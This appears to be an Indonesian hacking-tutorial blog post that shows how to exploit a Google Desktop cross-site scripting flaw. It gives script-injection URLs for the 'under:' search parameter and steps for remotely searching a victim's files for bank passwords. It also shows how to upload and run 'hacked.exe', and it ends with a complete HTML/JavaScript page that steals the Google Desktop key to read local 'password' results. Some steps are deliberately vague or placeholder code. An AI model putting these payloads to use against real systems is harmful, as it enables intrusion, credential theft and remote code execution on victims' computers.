toolbar, dll sangat sering dilakukan oleh semua orang namun mereka tidak tahu betapa bahaya
nya menginstall aplikasi online di dalam komputer karna kita tidak tahu aplikasi ini mengakses atau
merubah apa saja dari sistem kernel kita.
Nah berikut ini saya jelaskan tutorial bagaimana kita dapat melakukan hacking / remote untuk
melihat aktivitas bahkan akses sensitive sekalipun seperti password, kartu kredit, rekening bank dll
dengan memanfaatkan bug dari google desktop.
========================================================================
Seperti biasa......... :)
Artikel ini saya buat untuk ilmu pengetahuan semata, saya tidak bertanggung jawab atas penyalah
gunaan artikel ini, USE IT WITH YOUR OWN RISK OK?
created by : DOKTER^CINTA
thanks to : #indohacking, #yogyafree, #jam5, #antihackerlink, dan teman² ku tercinta
muach muach to you all...........
specially : kekasih ku yang tak pernah kembali
========================================================================
OK, Lets Start,
mari kita bermain main dengan basic terlebih dahulu untuk mengetahui apakah google desktop
yang anda punya ada lubang nya atau tidak.
buka browser internet explorer anda lalu klik google desktop sehingga muncul tampilan search dari
google lalu ketikkan di dalam kotak search berikut ini :
under:"C:\"
kemudian klik "search desktop" dan lihat hasil nya seluruh data anda di dalam drive c sangat jelas
kelihatan (berbahaya kan????)
kemudian coba kita manfaatkan akses script dari html untuk melihat kelemahan nya ketikkan di
dalam kotak search paling atas berikut ini :
under:<script>alert(1)</script>
kemudian klik "search" dan lihat hasil nya maka akan muncul sebuah kotak pesan dengan pesan
nya adalah 1
kemudian coba kita search sebuah keyword terserah kita lalu klik search maka tetap akan muncul
sebuah kotak pesan dengan pesan nya adalah 1
untuk menghilangkan kotak pesan dengan pesan 1 berikut maka yang harus kita ketikkan adalah:
under:"C:\temp3"
ok selesai dengan basic nya...............
mari kita lanjutkan
=======================================================
metode 1: kirim email agar temen kita melihat web kesayangan kita (awas jangan dipake metode
ini untuk spam ya, hehehehe)
kirimkan sebuah email ke teman anda yang menggunakan google desktop di komputer nya
dengan mengirimkan beberapa hal berikut ini
1. kirim xmlhttp request ke google (cari sendiri ya xmlhttp request nya)
2. ekstrak signature dari link google desktop (cari sendiri ya signature nya)
3. kirim blind request ke google desktop untuk mengeksploitasi "under" parameter (cari sendiri ya
blind request nya)
4. redirect kan target ke salah satu web tujuan
maka teman anda ketika membuka link dari email anda secara otomatis lari ke link web tujuan
anda
metode 1 selesai
=======================================================
metode 2 : remote pc
berikut ini contoh salah satu script nya, sisa nya kembangkan imajinasi mu....
==== code start =====
var xterm ='kata kunci';
dodekstopsearch(xterm);
==== end of code ====
kemudian kirim ke target pake tools scripts injector
http://127.0.0.1:4664/options&s=under:"<script src=http://localhost/aspscript.asp>"
maka akan keliatan di address bar mu seperti berikut ini
http://127.0.0.1:4664/options&s=under%3A%22%3Cscript+src%3Dhttp%3A%2Flocalhost/aspscript.asp%
3E%22
maka akan muncul hasil nya
http://127.0.0.1:4664/options&s=XXXXXXXXXXXXXXXXXXXXXX
kemudian dengan menggunakan port 4664 (port default nya) hehehhe
maka kita dapat melakukan remote dengan menggunakan ip nya
berikut ini contoh nya saya buat pake localhost
http://127.0.0.1:4664/search&s=xxxxxxxxxxxxxxxxxxxxxxx?q=kata kunci
maka dari log yang saya lihat di history internet explorer hasil nya seperti ini
[15/jul/2007:04:15:41 -0400] "GET /forum/style_imag HTTP/1.1" 404 2941
"http://127.0.0.1:4664/search&s=xxxxxxxxxxxxxxxxxxxxxxx?q=bank password"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
nah bagaimana kalo ip yang 127.0.0.1 di ganti dengan ip anda plus sedikit tehnik???? wah wah
wah tau sendiri kan akibat nya
maka si penyerang tinggal mengetikkan bank password dan search untuk melihat apakah dalam
direktory anda ada file bank password. dan binggo... data anda telah di intip, di copy, dan di.... tau
sendiri lah
kemudian si penyerang juga bisa merubah option dari google desktop anda berikut ini contoh salah
satu script nya
==== code start =====
changeoptions();
==== end of code ====
kemudian si penyerang juga bisa menyembunyikan option dari google desktop anda berikut ini
contoh salah satu script nya
==== code start =====
hideOptionChanges();
==== end of code ====
dan lain nya.......... silahkan kembangkan imajinasi mu ya....................
namun berikut ini yang paling saya sukai
kirim program pesan yang sudah kita buat sebelum nya dan kirim pake script injector mu (jangan
kirim virus ke orang ya, hehehehe)
http://127.0.0.1:4664/options&s=under:"<script
src=http://localhost/aspscript.asp?upload=hacked.exe>"
kemudian kita cek apakah data nya sudah nyampe dengan mengirimkan code berikut ini
==== code start =====
var xterm ='hacked filetype:exe';
dodekstopsearch(xterm);
==== end of code ====
kemudian eksekusi program nya
http://127.0.0.1:4664/options&s=under:"<script src=http://localhost/aspscript.asp?aksi=hacked.exe>"
maka binggo, di komputer target keluarlah pesan "KAMU TELAH DI HACK oleh bla bla bla"
metode 2 selesai
=======================================================
nah mengerikan bukan, semudah itu orang menyusup ke komputer anda dan mengobrak abrik
komputer anda. Jadi saran saya hati2 lah menginstall aplikasi online di komputer anda dan selalu
update software anda
berikut ini saya buat script dasar untk melihat apakah komputer anda ada lubang nya atau tidak
copy paste kode di bawah ini ke dalam notepad lalu simpan dengan nama file "cek.html" dengan
save as type "all files"
==== code start =====
<html>
<head>
<title>Dokter^cinta - Google Desktop Exploit Cek Lubang anu mu</title>
<style type="text/css">
@import url(http://news.google.com/news?hl=en&ned=us&q=%7D%7B);
</style>
</head>
<body>
<h2>Google Desktop Exploit cek lubang anu mu</h2>
<p>
menerima kode CSS HTML dari Google News :<br>
<textarea rows="20" cols="80" id="gnewsssrc"></textarea>
<p>
melihat kunci dari Google Desktop dari kode di atas:<br>
<input type="text" size="50" id="gdskey">
<p>
menerima hasil dari local Google Desktop untuk kata kunci "password" dari CSS HTML setelah di
parsing:<br>
<textarea rows="20" cols="80" id="gdsresult">SILAHKAN TUNGGU..........</textarea>
<p>
hasil original dari Google Desktop dari local machine:<br>
<iframe width="620" height="300" id="gdspage"></iframe>
<p>
<script>
function showResults()
{
document.getElementById("gdsresult").innerText = document.styleSheets(0).imports(1).cssText;
}
document.getElementById("gnewsssrc").innerText = document.styleSheets(0).imports(0).cssText;
var re = new RegExp(" 127.0.0.1:4664/search&s=(.+?)\?q");
var reRes = re.exec(document.styleSheets(0).imports(0).cssText);
if (reRes)
{
document.getElementById("gdskey").innerText = reRes[1];
var searchURL = "http://127.0.0.1:4664/search&s=" + reRes[1] + "q=%7Bpassword";
document.styleSheets(0).addImport(searchURL);
document.getElementById("gdspage").src = searchURL;
setTimeout('showResults()', 5000);
}
else
{
document.getElementById("gdskey").innerText = "gagal menerima link dari Google Desktop";
document.getElementById("gdsresult").innerText = "gagal menerima hasil dari Google Desktop ";
}
</script>
</body>
</html>
==== end of code =====
Sign up here with your email
ConversionConversion EmoticonEmoticon